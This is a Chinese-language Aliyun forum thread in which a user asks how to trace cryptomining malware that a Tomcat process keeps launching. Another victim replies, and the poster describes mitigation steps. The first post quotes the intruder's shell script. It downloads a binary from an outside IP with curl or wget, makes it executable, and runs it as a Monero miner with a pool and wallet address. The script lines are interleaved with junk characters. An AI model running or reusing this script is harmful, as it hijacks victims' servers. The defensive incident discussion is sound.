阿里云
阿里云多端小程序中小企业获客首选
发表主题 回复主题
  • 4702阅读
  • 2回复

[云安全体系/架构/合规专区]挖矿病毒怎么排查

级别: 新人
发帖
4
云币
5
从6月开始,服务断断续续被植入了挖矿病毒,然后我们追踪了一部分入口。发现服务器上会不定时执行一个curl命令,这个命令的父进程是java的tomcat容器 J4v0O="  
下面是那个shell脚本的内容,现在不知道对方是怎么进来的。 xDGS`U  
PN"8 Y  
Ft;u\KT  
3<Z'F}lg  
a,'Ncg  
f-3'D-{EKt  
>*= =wlOB  
U=http://107.150.2.61/autox ^{*f3m/  
AGENT_FILE='/tmp/autox' 3g0u#t{  
if command -v curl > /dev/null 2>&1; then o"#TZB+k  
  curl -s $U > $AGENT_FILE K6v $#{$6  
elif command -v wget > /dev/null 2>&1; then n{^<&GWox  
  wget -q $U -O - > $AGENT_FILE FL`1yD^2  
else vXWsF\g  
  curl -s $U > $AGENT_FILE i}`_H^  
fi sB( `[5I  
if [ ! -x $AGENT_FILE ]; then gX$0[ sIS.  
  chmod +x $AGENT_FILE m0|Ae@g~3  
fi 7a:*Y"f,~  
ps -ef|grep $AGENT_FILE|grep -v grep 9p2>`L  
if [ $? -ne 0 ]; then j,=*WG  
  nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB -p x > /dev/null 2>&1 & *H5PT  
fi %6A-OF  
mQJ4;BJw  
9fP) Fwih  
%j *k  
关键词: 挖矿 java 病毒
级别: 新人
发帖
2
云币
3
只看该作者 沙发  发表于: 2017-07-07
Re挖矿病毒怎么排查
大神是否已解决? \6 \hnP  
小弟也遇到这个问题,求教解决办法Q276767466
级别: 新人
发帖
4
云币
5
只看该作者 板凳  发表于: 2017-07-07
回 1楼q276767466的帖子
没有解决,现在准备升级tomcat,加了防火墙,把定时任务的文件加固,然后追踪这个病毒是通过tomcat进程来执行的。
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
 
验证问题: ECS是阿里云提供的什么服务? 正确答案:云服务器
上一个 下一个
      ×
      全新阿里云开发者社区, 去探索开发者的新世界吧!
      一站式的体验,更多的精彩!
      通过下面领域大门,一起探索新的技术世界吧~ (点击图标进入)